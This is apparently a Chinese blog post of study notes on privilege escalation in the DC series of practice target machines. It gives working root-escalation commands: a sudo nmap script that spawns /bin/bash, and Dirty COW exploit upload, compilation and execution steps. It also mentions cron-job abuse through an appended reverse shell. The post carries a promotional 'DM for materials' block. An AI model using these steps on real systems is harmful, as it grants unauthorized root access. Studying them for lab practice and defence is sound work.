ETC|DC系列靶机知识点总结( 二 ) Python

sudo之nmap提权
我们使用 sudo -l命令发现我们可以不用密码就能以root权限运行nmap
然后我们可以利用nmap来提权

echo ‘os.execute(\"/bin/bash\")’ > shell #写一个脚本，调用系统命令执行/bin/bash
sudo nmap --script=shell

由于我们可以以root权限运行nmap ，然后我们让nmap去执行这个shell脚本，从而获取到一个root权限的shell 。

【一>所有资源关注我，私信回复“资料”获取<一】

1、网络安全学习路线

2、电子书籍（白帽子）

3、安全大厂内部视频

4、100份src文档

5、常见安全面试题

6、ctf大赛经典题目解析

7、全套工具包

8、应急响应笔记

脏牛提权

upload /root/dcow.cpp 192.168.26.128 /tmp #上传exp到靶机的 /tmp目录下
shell
python -c ‘import pty;pty.spawn(\"/bin/bash\")’ #优化终端界面，便于操作
cd /tmp
chmod +x dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
##########################################
-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别， -O0表示没有优化-O1为缺省值， ->O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时，需要链接pthread库
-o dcow gcc生成的目标文件名字为dcow
##########################################
./dcow #执行
第三方特定版本插件提权screen4.5.0、exim 4等
定时任务提权：【ETC|DC系列靶机知识点总结】如果定时任务是以root权限运行的，并且低权限用户可以修改定时任务的脚本，那么可以尝试追加或者改写定时任务的脚本来提权，例如在脚本后面追加一行反弹shell的命令来获取到root权限。
其他知识点：逃逸出rbash的一些方法